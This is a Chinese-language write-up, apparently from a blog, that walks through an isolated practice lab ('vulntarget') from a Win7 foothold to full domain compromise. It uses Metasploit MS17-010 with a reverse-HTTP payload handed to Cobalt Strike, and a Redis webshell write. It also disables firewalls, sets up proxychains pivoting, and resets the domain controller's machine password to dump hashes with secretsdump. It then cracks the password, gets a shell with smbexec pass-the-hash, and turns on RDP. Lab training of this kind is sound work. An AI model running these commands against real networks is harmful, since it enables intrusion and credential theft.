链接: https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg 提取码: 2dwq
环境搭建
vm18网卡:10.0.20.0
vm19网卡:10.0.10.0
“
win7:NAT+VM18
windows 2016:VM18+VM19
windows 2019:VM19
记得禁用网卡,否则物理机PC可以直通所有网络,无法模拟真实环境
知识点
OA、二层代理、域控、msf会话传CS、redis未授权写入、CS生成正反向马连接,windwos防火墙命令、impacket脚本利用、注册表添加、windows远程连接命令
win7
个人习惯做靶机直接fscan扫
ms17_010能够getshell
msfconsolesearch ms17_010use 0set rhosts 10.10.10.130run
端口80,OA系统,工具getshell方法也可以(这里的IP换成外网IP,我这里是msf打完又打了OA做的演示,至于80等端口没扫到,应该是工具流量问题)
msf上线CS
bguse exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset lport 2222set session 1run
抓取到密码admin
,没有开启3389
端口不能远程连接
用msf探测网段
run autorouterun post/multi/manage/autoroute
CS的插件进行ipconfig /all
win 2016
开启端口扫描,10.0.20.99:6379
、80、5985
portscan 10.0.20.0-10.0.20.255 1-1024,3389,5000-6400 arp 1024
portscan能扫到,fscan和nmap扫存活与开放端口都有问题,猜测可能也是工具流量问题
由于kali作为流量转发机器,无法走全局流量,设置proxychains4代理
使用无影扫目录,phpinfo信息,绝对路径C:/phpStudy/PHPTutorial/WWW/
redis写入webshell
信息
CS生成正向连接,connect 10.0.20.99 5555
不通,查看防火墙情况netsh firewall show state
,蚁剑权限较高,关闭防护墙netsh firewall set opmode mode=disable
运行CS生成的正向连接马
net time /domain
查看是否在域内,存在域,并且域控地址为10.0.10.110
看一下域控制器net group "domain controllers" /domain
win 2019
继续portscan对域控主机扫描
portscan 10.0.10.0-10.0.10.255 1-1024,3389,5000-6000 arp 1024
使用nmap的默认脚本扫描和fscan扫描
使用CS插件
回显Success! Use pth .\WIN2019$ 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync
密码被置空
获取域控hash值
proxychains4 python3 /usr/share/doc/python3-impacket/examples/secretsdump.py vulntarget.com/WIN2019\$@10.0.10.110 -just-dc -no-pass
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15
写入hash.txt,John去跑,得到域控密码Admin@666
smbexec.py获取交互式shell
proxychains4 python3 /usr/share/doc/python3-impacket/examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 [email protected]
获取shell编码错误,chcp 65001不能解决,chcp.com
查看编码格式,-codec cp936
重新获取域控
proxychains4 python3 /usr/share/doc/python3-impacket/examples/smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 -codec cp936 [email protected]
注册表添加键值,配置远程桌面服务端口号
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
允许远程连接
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
允许其他设备通过3389远程连接当前桌面服务
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
vulntarget.com\administrator
进行CS上线,关闭防火墙,正向连接cs,netsh advfirewall set allprofiles state off
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论